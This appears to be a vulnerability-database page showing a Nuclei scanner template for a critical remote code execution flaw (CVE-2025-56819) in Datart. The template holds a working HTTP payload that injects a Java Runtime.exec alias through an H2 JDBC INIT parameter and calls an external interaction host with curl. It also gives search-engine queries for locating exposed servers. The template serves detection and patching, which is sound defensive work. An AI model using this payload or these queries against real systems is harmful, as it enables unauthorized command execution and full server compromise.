Datart v1.0.0-rc.3 - Remote Code Execution
| Reporter | Title | Published | Views | Family All 11 |
|---|---|---|---|---|
| CVE-2025-56819 | 24 Sep 202521:00 | – | circl | |
| datart 安全漏洞 | 24 Sep 202500:00 | – | cnnvd | |
| CVE-2025-56819 | 24 Sep 202500:00 | – | cve | |
| CVE-2025-56819 | 24 Sep 202500:00 | – | cvelist | |
| EUVD-2025-31018 | 3 Oct 202520:07 | – | euvd | |
| CVE-2025-56819 | 7 Sep 202607:16 | – | kitploit | |
| CVE-2025-56819 | 24 Sep 202516:15 | – | nvd | |
| CVE-2025-56819 | 24 Sep 202516:15 | – | osv | |
| PT-2025-39288 | 24 Sep 202500:00 | – | ptsecurity | |
| CVE-2025-56819 | 25 Sep 202515:49 | – | redhatcve |
10
id: CVE-2025-56819
info:
name: Datart v1.0.0-rc.3 - Remote Code Execution
author: Redmomn
severity: critical
description: |
Datart v1.0.0-rc.3 contains a vulnerability that allows remote attackers to execute arbitrary code via INIT connection parameters.
impact: |
Remote attackers can execute arbitrary code, potentially leading to full system compromise.
remediation: |
Update to the latest version.
reference:
- https://github.com/advisories/GHSA-623q-jr4p-f87c
- https://github.com/xyyzxc/CVE-2025-56819
- https://nvd.nist.gov/vuln/detail/CVE-2025-56819
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2025-56819
epss-score: 0.03196
epss-percentile: 0.87395
cwe-id: CWE-78
cpe: cpe:2.3:a:running-elephant:datart:1.0.0:rc3:*:*:*:*:*:*
metadata:
verified: true
max-request: 3
vendor: datart
product: datart
fofa-query: 'title="Datart"'
shodan-query: 'title:"Datart"'
hunter-query: 'web.title="Datart"'
tags: cve,cve2025,datart,rce,h2,jdbc,oast,authentication,vuln
variables:
rand_alias: '{{rand_text_alpha(8)}}'
flow: http(1) && http(2)
http:
- raw:
- |
POST /api/v1/users/login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"username":"{{username}}","password":"{{password}}"}
matchers:
- type: dsl
dsl:
- 'contains_all(body, "email\":", "data\":{")'
- 'status_code == 200'
internal: true
extractors:
- type: kval
name: token
part: header
kval:
- authorization
internal: true
- raw:
- |
POST /api/v1/data-provider/test HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
Authorization: {{token}}
{
"name": "jdbc-data-provider",
"type": "JDBC",
"properties": {
"dbType": "H2",
"url": "jdbc:h2:mem:testdb;TRACE_LEVEL_SYSTEM_OUT=3;INIT=CREATE ALIAS {{rand_alias}} AS 'void cmd_exec(String cmd) throws java.lang.Exception {Runtime.getRuntime().exec(cmd)\\;}'\\;CALL {{rand_alias}} ('curl {{interactsh-url}}')\\;",
"user": null,
"password": "",
"driverClass": "org.h2.Driver",
"serverAggregate": false,
"enableSpecialSQL": false,
"enableSyncSchemas": true,
"syncInterval": "60",
"properties": {}
}
}
matchers:
- type: word
part: interactsh_protocol
words:
- 'dns'
extractors:
- type: json
part: body
name: message
json:
- '.message'
internal: true
# digest: 4a0a00473045022100fbe09518c63b1ac901e55cfccf83ee47c8a56671211a83e25f74707f0700ba5a022076a8c059b4e526f95cbf7fbb06b21ec163aebe502a4053d61384676496c46d74:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
15 Oct 2025 10:10Current
6.7Medium risk
Vulners AI Score6.7
CVSS 3.19.8
EPSS0.03196
SSVC